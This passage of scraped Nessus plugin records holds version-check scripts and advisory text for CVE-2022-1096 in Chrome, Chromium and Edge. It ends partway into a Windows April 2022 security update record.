HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-25T00:00:00", "type": "nessus", "title": "Google Chrome < 99.0.4844.84 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_99_0_4844_84.NASL", "href": "https://www.tenable.com/plugins/nessus/159236", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159236);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n\n script_name(english:\"Google Chrome < 99.0.4844.84 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 99.0.4844.84. It is, therefore, affected by\na vulnerability as referenced in the 2022_03_stable-channel-update-for-desktop_25 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?671782b7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1309225\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 99.0.4844.84 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'99.0.4844.84', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:50:14", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 323f900d-ac6d-11ec-a0b8-3065ec8fd3ec advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-26T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- V8 type confusion (323f900d-ac6d-11ec-a0b8-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_323F900DAC6D11ECA0B83065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/159238", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159238);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n\n script_name(english:\"FreeBSD : chromium -- V8 type confusion (323f900d-ac6d-11ec-a0b8-3065ec8fd3ec)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 323f900d-ac6d-11ec-a0b8-3065ec8fd3ec advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?671782b7\");\n # https://vuxml.freebsd.org/freebsd/323f900d-ac6d-11ec-a0b8-3065ec8fd3ec.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ff16c010\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'chromium<99.0.4844.84'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:43:12", "description": "The version of Google Chrome installed on the remote Windows host is prior to 99.0.4844.84. It is, therefore, affected by a vulnerability as referenced in the 2022_03_stable-channel-update-for-desktop_25 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-25T00:00:00", "type": "nessus", "title": "Google Chrome < 99.0.4844.84 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_99_0_4844_84.NASL", "href": "https://www.tenable.com/plugins/nessus/159235", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159235);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n\n script_name(english:\"Google Chrome < 99.0.4844.84 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 99.0.4844.84. It is, therefore, affected\nby a vulnerability as referenced in the 2022_03_stable-channel-update-for-desktop_25 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?671782b7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1309225\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 99.0.4844.84 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\nvar installs = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'99.0.4844.84', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:42:33", "description": "The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5110 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-28T00:00:00", "type": "nessus", "title": "Debian DSA-5110-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "p-cpe:/a:debian:debian_linux:chromium-common", "p-cpe:/a:debian:debian_linux:chromium-driver", "p-cpe:/a:debian:debian_linux:chromium-l10n", "p-cpe:/a:debian:debian_linux:chromium-sandbox", "p-cpe:/a:debian:debian_linux:chromium-shell", "cpe:/o:debian:debian_linux:11.0"], "id": "DEBIAN_DSA-5110.NASL", "href": "https://www.tenable.com/plugins/nessus/159269", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5110. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159269);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n\n script_name(english:\"Debian DSA-5110-1 : chromium - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5110\nadvisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/chromium\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2022/dsa-5110\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-1096\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/chromium\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (bullseye), this problem has been fixed in version 99.0.4844.84-1~deb11u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-driver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-l10n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-sandbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-shell\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar release = get_kb_item('Host/Debian/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Debian');\nvar release = chomp(release);\nif (! preg(pattern:\"^(11)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 11.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '11.0', 'prefix': 'chromium', 'reference': '99.0.4844.84-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-common', 'reference': '99.0.4844.84-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-driver', 'reference': '99.0.4844.84-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-l10n', 'reference': '99.0.4844.84-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-sandbox', 'reference': '99.0.4844.84-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-shell', 'reference': '99.0.4844.84-1~deb11u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium / chromium-common / chromium-driver / chromium-l10n / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:50:14", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 99.0.1150.55. It is, therefore, affected by a vulnerability as referenced in the March 26, 2022 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-26T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 99.0.1150.55 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_99_0_1150_55.NASL", "href": "https://www.tenable.com/plugins/nessus/159239", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159239);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 99.0.1150.55 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 99.0.1150.55. It is, therefore, affected\nby a vulnerability as referenced in the March 26, 2022 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://docs.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#march-26-2022\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?991726b8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 99.0.1150.55 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar app_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nvar constraints = [\n { 'fixed_version' : '99.0.1150.55' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:43:50", "description": "The remote Windows host is missing security update 5012653. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26798, CVE-2022-26801, CVE-2022-26786, CVE-2022-24549, CVE-2022-26794, CVE-2022-26802, CVE-2022-26792, CVE-2022-26797, CVE-2022-26787, CVE-2022-26803, CVE-2022-26796, CVE-2022-26790, CVE-2022-26904, CVE-2022-26808, CVE-2022-26788, CVE-2022-24544, CVE-2022-24540, CVE-2022-24486, CVE-2022-24481, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24547, CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530, CVE-2022-26807)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26916, CVE-2022-26919, CVE-2022-26917, CVE-2022-26809, CVE-2022-26918, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24528, CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24493, CVE-2022-24498, CVE-2022-24483)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012653: Windows 10 version 1507 LTS Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26831", "CVE-2022-26832", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012653.NASL", "href": "https://www.tenable.com/plugins/nessus/159680", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159680);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n 